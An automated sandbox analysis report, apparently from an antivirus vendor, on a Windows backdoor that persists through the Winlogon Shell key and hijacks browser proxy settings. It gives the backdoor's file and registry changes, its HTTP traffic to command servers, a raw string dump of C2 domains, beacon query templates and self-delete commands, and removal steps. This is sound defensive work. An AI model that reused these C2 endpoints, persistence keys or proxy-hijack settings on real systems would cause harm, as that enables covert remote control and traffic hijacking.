MD5: 433902d636a854854ec11eb2af93d1eb
SHA1: 8318113c3e8b3d493a66dd8c726f6adc4addefc8
SHA256: 082a78e0047ee92d4f072390e185efa4fd3eb543432e1b45b8b3d1e8042573ba
SSDeep: 3072:nYLcSldfhpukdE3ats J8vMtDS4AmN0mWotFowQjaxmiKqd1NDfCJyc:nYgS3hHdE/ J8vQDWotFvQjaIiKqdrDG
Size: 170496 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Premium Installer
Created at: 2005-09-22 00:51:49
Analyzed on: WindowsXP SP3 32-bit

Summary:

Backdoor. Malware that enables a remote control of victim's machine.

Payload

No specific payload has been found.

Process activity

The Backdoor creates the following process(es):

%original file name%.exe:312
%original file name%.exe:912

The Backdoor injects its code into the following process(es):

%original file name%.exe:716

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:716 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Program Files%\LP\4645\1.exe (43 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT (4252 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (6520 bytes)
%Program Files%\LP\4645\2.exe (43 bytes)
%Documents and Settings%\%current user%\Application Data\507CF\F2C6.07C (3964 bytes)
%Documents and Settings%\%current user%\Application Data\507CF\5C946.exe (85017 bytes)

The Backdoor deletes the following file(s):

%Program Files%\LP\4645\1.exe (0 bytes)
%Program Files%\LP\4645\2.exe (0 bytes)

Registry activity

The process %original file name%.exe:312 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA 77 C5 AE 3C BC 5F 7F F5 2F 2F 1A 01 0E BE 28"

[HKLM\SOFTWARE\Microsoft\Direct3D\MostRecentApplication]
"Name" = "%original file name%.exe"

The process %original file name%.exe:716 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 03 00 00 00 14 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:59980"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB 87 2D 00 E8 D3 E2 B7 AB D2 85 C7 40 ED 04 19"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Direct3D\MostRecentApplication]
"Name" = "%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 03 00 00 00 03 00 00 00 14 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Backdoor adds the reference to itself to be executed when a user logs on:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,%Documents and Settings%\%current user%\Application Data\507CF\5C946.exe"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyOverride"

The process %original file name%.exe:912 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0A CC 7E 9F C6 DC 11 63 6D FA 2F 2F 7F 1A 7F D8"

[HKLM\SOFTWARE\Microsoft\Direct3D\MostRecentApplication]
"Name" = "%original file name%.exe"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://binghamtonschools.org/images/ace/1/ace_1101278014_1314729789.jpg?sv=967&tq=gJ4WK/SUh7TFk0R8oY+QtMWTUj26kJH7yZJTNbqVybhqtUn5CGFATA==	174.129.25.170
hxxp://l8x4b5.remindmeroster.com/logo.png?sv=114&tq=gKZEtzoYwLzEvUb5dQzRsrCqA/YvTca3l74EgC1OjrPGpgfib1XFp5zpRPksUt+A/gSoSEU=	141.8.225.62

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /logo.png?sv=114&tq=gKZEtzoYwLzEvUb5dQzRsrCqA/YvTca3l74EgC1OjrPGpgfib1XFp5zpRPksUt+A/gSoSEU= HTTP/1.0

Connection: close

Host: l8x4b5.remindmeroster.com

Accept: */*

User-Agent: chrome/9.0

HTTP/1.1 200 OK

Date: Thu, 24 Jul 2014 05:56:23 GMT

Server: Apache

Set-Cookie: gvc=909vr1537269833728567; expires=Tue, 23-Jul-2019 05:56:23 GMT; path=/; domain=l8x4b5.remindmeroster.com; httponly

Vary: Accept-Encoding,User-Agent

Content-Length: 51

Keep-Alive: timeout=5, max=128

Connection: close

Content-Type: text/html; charset=UTF-8
<html><head></head><body><!-- vbe --><
;/body></html>..

GET /images/ace/1/ace_1101278014_1314729789.jpg?sv=967&tq=gJ4WK/SUh7TFk0R8oY+QtMWTUj26kJH7yZJTNbqVybhqtUn5CGFATA== HTTP/1.0

Connection: close

Host: binghamtonschools.org

Accept: */*

User-Agent: chrome/9.0

HTTP/1.1 301 Moved Permanently

Server: nginx/1.4.2

Date: Thu, 24 Jul 2014 05:56:10 GMT

Content-Type: text/html

Content-Length: 184

Connection: close

Location: hXXp://VVV.binghamtonschools.org/images/ace/1/ace_1101278014_1314729789.jpg?sv=967&tq=gJ4WK/SUh7TFk0R8oY+QtMWTUj26kJH7yZJTNbqVybhqtUn5CGFATA==
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx/1.4.2</center>..</body>..</html>....

The Backdoor connects to the servers at the folowing location(s):

`.rsrc

.SS%o

SSj%S

<%u,V

<3%u1f

cmd.exe

GetProcessWindowStation

operator

deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler

1.2.5

>`Visual C   CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

inflate 1.2.5 Copyright 1995-2010 Mark Adler

%d lines of %s read.

%d Function Prototypes found.

Including %d Library Functions.

.bss align=16

copy /b data.tmp   bss.tmp   code.tmp %s

copy /b code.tmp   data.tmp   bss.tmp %s

del *.tmp

copy /b data.tmp   code.tmp %s

al,%s

eax,%s

%s is not valid in:

Warning - Return from non-void function %s with no value

elend

.text

Warning -- "break" not supported in:

Error: %s not defined!

.data align=16

B1-1231 Warning - %s re-defined!

B1-1282 Warning - %s re-defined!

times %d db 0

times %d dd 0

XML-20003: missing token %s at line %d, column %d

XML-20004: missing keyword %s at line %d, column %d

Action: Check/update the input data to the correct keyword.

XML-20006: unexpected text at line %d column %d; expected EOF

XML-20007: missing content model in element declaration at line %s, column %s

{35BCA615-C82A-4152-8857-BCC626AE4C8D}

\Windows NT

%s\%s

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

explorer.exe,%s

{A1D429DE-B782-4253-84AD-6E09A8438AD5}

{4D92BB9F-9A66-458f-ACA4-66172A7016D4}

lvvm.exe

{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}

{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}

{6B985724-623F-492e-B0D6-C9715ADE853B}

{B37C48AF-B05C-4520-8B38-2FE181D5DC78}

{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}

Advapi32.dll

%s%s_1

%s_0_%d_%s

%s_%d

%s_%d_%d_%d_%d

%s_%s

http://xprstats.com/k1.php

type=%s&system=na&id=%s&status=%s

t=st&q=%s

%s?tq=%s

TMFLDMN%d

id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=118

%s_%s_%d

_1_%d

_2_%d

_3_%d

_4_%d

grizlybigtit.com

cloudstorepro.com

remindmeroster.com

yordatazone.com

sitystorefor.com

datastorepro.com

onlinepdahelpforyou.com

remarkreddomas.com

transfersakkonline.com

backupdomaintolevel.com

SELECT_RESERV_SRV_%d

http://%s.%s

%s.%s

stor.cfg

exec%s

%s_%d_%s

id=%s&c=%d

%s_%d_%d_%d

%s_%d_%d

%s %s

%s start%s%c%s

c1.exe

c2.exe

c3.exe

DWN_CON_STRP_%d_%s

http://

http://%d.ctrl.%s

logo.png

img/135.png

img/136.png

t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d

t=%s&q=&s=%d&hrs=%d

%s/%s?sv=%d&tq=%s

%s:%d/%s?sv=%d&tq=%s

http://binghamtonschools.org/images/ace/1/ace_1101278014_1314729789.jpg

http://binghamtonschools.org/images/297893.jpg

http://binghamtonschools.org/images/297894.jpg

http://alleducationalsoftware.com/creditcardlogos.gif

http://alleducationalsoftware.com/creditcard.png

http://alleducationalsoftware.com/creditcard2.png

http://patentgenius.com/temp/head.png

http://patentgenius.com/132.gif

http://patentgenius.com/133.gif

http://freedownload3.com/screenshot/4/s/89_3276.gif

http://freedownload3.com/screenshot/4/s/89_3277.gif

http://freedownload3.com/screenshot/4/s/89_3278.gif

http://istockanalyst.com/png/intel.gif

http://istockanalyst.com/png/intel.jpg

http://istockanalyst.com/12.jpg

http://complaintsboard.com/complaints/logo.png

http://complaintsboard.com/complaints/zip.png

http://complaintsboard.com/complaints/rar.png

http://highspeedinternetlosangeles.webnode.com/news/1.cgi

http://highspeedinternetlosangeles.webnode.com/news/1.php

http://highspeedinternetlosangeles.webnode.com/news/2.php

http://newworldorderreport.com/favicon.ico

http://newworldorderreport.com/img/3421.png

http://newworldorderreport.com/img/3422.png

http://jointhenewworldorder.com/images/pages.jpg

http://jointhenewworldorder.com/images/pages.png

http://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame6.png

http://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame7.png

http://cdn.adventofdeception.com/logo.png

t=t&hrs=%d&q=id=1000&ver=%s&s=%d

t=ip&hrs=%d&q=&s=1

%s?sv=%d&tq=%s

\bl%d_64.bat

del "%s"

if exist "%s" goto a

cmd.exe /c "%s"

GET %s HTTP/1.1

Host: %s

User-Agent: chrome/9.0

{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d

{C66E79CE-8935-4ed9-A6B1-4983619CB925}

{61B98B86-5F44-42b3-BCA1-33904B067B81}

{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}

{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}

ahst.lni

milktoyoustudios.com

http://%s/s.php?c=121&id=%s

bigbulkhypnocrys.com

http://xprstats.com/images/logo.png

drweb

id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d

t=ml&q=%s

xprstats.com

http://%s%s

%s_1_%d_%s

%s_2_%d_%s

%s_3_%d_%s

%s_4_%d_%s

pmv=2&id=%s&hwid=%s

u.exe

%s up%s

&%s=%s

avgnt.exe

AVGIDSAgent.exe

avgwdsvc.exe

ccsvchst.exe

AvastUI.exe

mcagent.exe

PRM_LSTN_THIS_PORT

Opera

127.0.0.1

HTTP/1.x

google.com

http://www.google.com

HTTP/1.1 302 Found

Location: %s

id=%s&type=%d&ppcid=%s

%s: %s

%s_5_%s

http=127.0.0.1:

prefs.js

Mozilla

"network.proxy.http"

"network.proxy.http_port"

"network.proxy.type"

"127.0.0.1"

%s(%s, %s);

operaprefs.ini

Use HTTP

HTTP server

127.0.0.1:%s

%s=%s

%s:%s

hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s

id=%s&hwid=%s

exec|%s

http=

HTTP/1.0 200 OK

bing.com

yahoo.com

search.aol.

suche.aol.

searcht2.aol.

.yimg.com

.bing.net

scorecardresearch.com

brightcove.com

.aol.

.atwola.

.ivwbox.

.google

.atdmt.

.abmr.

.tacoda.

.adtechus.

.autodatadirect.

.mapquestapi.

.ggpht.

.virtualearth.

.opera.

.microsoft.

.wsod.

.doubleclick.

.ypcdn.

.truveo.

.tlowdb.

mapq.st

.dartsearch.

.thawte.

http://

bing.com/search

bing.com:80/search

search.yahoo.com/search

%s_1_%s

err%d%s_%d_%d

err0%s_%d_%d

ver=118&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d

%s:443/%s

%s_2_%s

%s_%s_%s

%s_3_%s

www.www.ru

https://

.doubleclick.net

doubleclick.net

msn.com

%s_0%d_%d

=='undefined'?'%s':'%s'

.referrer

HTTP/1.0

%s %s %s

http://www.google.com/

http://www.yahoo.com/

.class

.midi

google_ad.url

google_ad.title

r.msn.com

google_ad.line1

zcÁ

c:\%original file name%.exe

%Program Files%\CF2C6

%Documents and Settings%\%current user%\Application Data\507CF

%Program Files%\LP\4645

GetCPInfo

RegFlushKey

RegOpenKeyExA

RegCloseKey

WinHttpReadData

WinHttpOpenRequest

WinHttpOpen

WinHttpQueryDataAvailable

WinHttpReceiveResponse

WinHttpSendRequest

WinHttpConnect

WinHttpCloseHandle

`.rdata

@.data

.rsrc

KERNEL32.DLL

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

RASAPI32.dll

RPCRT4.dll

SHELL32.dll

SHLWAPI.dll

USER32.dll

WINHTTP.dll

WININET.dll

WS2_32.dll

%-k}NB

4Z.Xn

mscoree.dll

nKERNEL32.DLL

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

WUSER32.DLL

Dr.Web

mhttp=127.0.0.1:%d

http://www.yahoo.com

2.0.2.1

%original file name%.exe_716_rwx_0015C000_00001000:

|VirtualProtect.dll

%original file name%.exe_716_rwx_00400000_0008E000:

`.rsrc

.SS%o

SSj%S

<%u,V

<3%u1f

cmd.exe

GetProcessWindowStation

operator

deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler

1.2.5

>`Visual C   CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

inflate 1.2.5 Copyright 1995-2010 Mark Adler

%d lines of %s read.

%d Function Prototypes found.

Including %d Library Functions.

.bss align=16

copy /b data.tmp   bss.tmp   code.tmp %s

copy /b code.tmp   data.tmp   bss.tmp %s

del *.tmp

copy /b data.tmp   code.tmp %s

al,%s

eax,%s

%s is not valid in:

Warning - Return from non-void function %s with no value

elend

.text

Warning -- "break" not supported in:

Error: %s not defined!

.data align=16

B1-1231 Warning - %s re-defined!

B1-1282 Warning - %s re-defined!

times %d db 0

times %d dd 0

XML-20003: missing token %s at line %d, column %d

XML-20004: missing keyword %s at line %d, column %d

Action: Check/update the input data to the correct keyword.

XML-20006: unexpected text at line %d column %d; expected EOF

XML-20007: missing content model in element declaration at line %s, column %s

{35BCA615-C82A-4152-8857-BCC626AE4C8D}

\Windows NT

%s\%s

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

explorer.exe,%s

{A1D429DE-B782-4253-84AD-6E09A8438AD5}

{4D92BB9F-9A66-458f-ACA4-66172A7016D4}

lvvm.exe

{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}

{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}

{6B985724-623F-492e-B0D6-C9715ADE853B}

{B37C48AF-B05C-4520-8B38-2FE181D5DC78}

{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}

Advapi32.dll

%s%s_1

%s_0_%d_%s

%s_%d

%s_%d_%d_%d_%d

%s_%s

http://xprstats.com/k1.php

type=%s&system=na&id=%s&status=%s

t=st&q=%s

%s?tq=%s

TMFLDMN%d

id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=118

%s_%s_%d

_1_%d

_2_%d

_3_%d

_4_%d

grizlybigtit.com

cloudstorepro.com

remindmeroster.com

yordatazone.com

sitystorefor.com

datastorepro.com

onlinepdahelpforyou.com

remarkreddomas.com

transfersakkonline.com

backupdomaintolevel.com

SELECT_RESERV_SRV_%d

http://%s.%s

%s.%s

stor.cfg

exec%s

%s_%d_%s

id=%s&c=%d

%s_%d_%d_%d

%s_%d_%d

%s %s

%s start%s%c%s

c1.exe

c2.exe

c3.exe

DWN_CON_STRP_%d_%s

http://

http://%d.ctrl.%s

logo.png

img/135.png

img/136.png

t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d

t=%s&q=&s=%d&hrs=%d

%s/%s?sv=%d&tq=%s

%s:%d/%s?sv=%d&tq=%s

http://binghamtonschools.org/images/ace/1/ace_1101278014_1314729789.jpg

http://binghamtonschools.org/images/297893.jpg

http://binghamtonschools.org/images/297894.jpg

http://alleducationalsoftware.com/creditcardlogos.gif

http://alleducationalsoftware.com/creditcard.png

http://alleducationalsoftware.com/creditcard2.png

http://patentgenius.com/temp/head.png

http://patentgenius.com/132.gif

http://patentgenius.com/133.gif

http://freedownload3.com/screenshot/4/s/89_3276.gif

http://freedownload3.com/screenshot/4/s/89_3277.gif

http://freedownload3.com/screenshot/4/s/89_3278.gif

http://istockanalyst.com/png/intel.gif

http://istockanalyst.com/png/intel.jpg

http://istockanalyst.com/12.jpg

http://complaintsboard.com/complaints/logo.png

http://complaintsboard.com/complaints/zip.png

http://complaintsboard.com/complaints/rar.png

http://highspeedinternetlosangeles.webnode.com/news/1.cgi

http://highspeedinternetlosangeles.webnode.com/news/1.php

http://highspeedinternetlosangeles.webnode.com/news/2.php

http://newworldorderreport.com/favicon.ico

http://newworldorderreport.com/img/3421.png

http://newworldorderreport.com/img/3422.png

http://jointhenewworldorder.com/images/pages.jpg

http://jointhenewworldorder.com/images/pages.png

http://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame6.png

http://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame7.png

http://cdn.adventofdeception.com/logo.png

t=t&hrs=%d&q=id=1000&ver=%s&s=%d

t=ip&hrs=%d&q=&s=1

%s?sv=%d&tq=%s

\bl%d_64.bat

del "%s"

if exist "%s" goto a

cmd.exe /c "%s"

GET %s HTTP/1.1

Host: %s

User-Agent: chrome/9.0

{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d

{C66E79CE-8935-4ed9-A6B1-4983619CB925}

{61B98B86-5F44-42b3-BCA1-33904B067B81}

{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}

{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}

ahst.lni

milktoyoustudios.com

http://%s/s.php?c=121&id=%s

bigbulkhypnocrys.com

http://xprstats.com/images/logo.png

drweb

id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d

t=ml&q=%s

xprstats.com

http://%s%s

%s_1_%d_%s

%s_2_%d_%s

%s_3_%d_%s

%s_4_%d_%s

pmv=2&id=%s&hwid=%s

u.exe

%s up%s

&%s=%s

avgnt.exe

AVGIDSAgent.exe

avgwdsvc.exe

ccsvchst.exe

AvastUI.exe

mcagent.exe

PRM_LSTN_THIS_PORT

Opera

127.0.0.1

HTTP/1.x

google.com

http://www.google.com

HTTP/1.1 302 Found

Location: %s

id=%s&type=%d&ppcid=%s

%s: %s

%s_5_%s

http=127.0.0.1:

prefs.js

Mozilla

"network.proxy.http"

"network.proxy.http_port"

"network.proxy.type"

"127.0.0.1"

%s(%s, %s);

operaprefs.ini

Use HTTP

HTTP server

127.0.0.1:%s

%s=%s

%s:%s

hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s

id=%s&hwid=%s

exec|%s

http=

HTTP/1.0 200 OK

bing.com

yahoo.com

search.aol.

suche.aol.

searcht2.aol.

.yimg.com

.bing.net

scorecardresearch.com

brightcove.com

.aol.

.atwola.

.ivwbox.

.google

.atdmt.

.abmr.

.tacoda.

.adtechus.

.autodatadirect.

.mapquestapi.

.ggpht.

.virtualearth.

.opera.

.microsoft.

.wsod.

.doubleclick.

.ypcdn.

.truveo.

.tlowdb.

mapq.st

.dartsearch.

.thawte.

http://

bing.com/search

bing.com:80/search

search.yahoo.com/search

%s_1_%s

err%d%s_%d_%d

err0%s_%d_%d

ver=118&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d

%s:443/%s

%s_2_%s

%s_%s_%s

%s_3_%s

www.www.ru

https://

.doubleclick.net

doubleclick.net

msn.com

%s_0%d_%d

=='undefined'?'%s':'%s'

.referrer

HTTP/1.0

%s %s %s

http://www.google.com/

http://www.yahoo.com/

.class

.midi

google_ad.url

google_ad.title

r.msn.com

google_ad.line1

zcÁ

c:\%original file name%.exe

%Program Files%\CF2C6

%Documents and Settings%\%current user%\Application Data\507CF

%Program Files%\LP\4645

GetCPInfo

RegFlushKey

RegOpenKeyExA

RegCloseKey

WinHttpReadData

WinHttpOpenRequest

WinHttpOpen

WinHttpQueryDataAvailable

WinHttpReceiveResponse

WinHttpSendRequest

WinHttpConnect

WinHttpCloseHandle

`.rdata

@.data

.rsrc

KERNEL32.DLL

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

RASAPI32.dll

RPCRT4.dll

SHELL32.dll

SHLWAPI.dll

USER32.dll

WINHTTP.dll

WININET.dll

WS2_32.dll

mscoree.dll

nKERNEL32.DLL

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

WUSER32.DLL

Dr.Web

mhttp=127.0.0.1:%d

http://www.yahoo.com

2.0.2.1

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   %original file name%.exe:312
   %original file name%.exe:912

2. Delete the original Backdoor file.
   
3. Delete or disinfect the following files created/modified by the Backdoor:
   

   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
   %Program Files%\LP\4645\1.exe (43 bytes)
   %Documents and Settings%\%current user%\NTUSER.DAT (4252 bytes)
   %Documents and Settings%\%current user%\NTUSER.DAT.LOG (6520 bytes)
   %Program Files%\LP\4645\2.exe (43 bytes)
   %Documents and Settings%\%current user%\Application Data\507CF\F2C6.07C (3964 bytes)
   %Documents and Settings%\%current user%\Application Data\507CF\5C946.exe (85017 bytes)

4. Remove the references to the Backdoor by modifying the following registry value(s) (How to Work with System Registry):
   

   [HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
   "Shell" = "explorer.exe,%Documents and Settings%\%current user%\Application Data\507CF\5C946.exe"

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.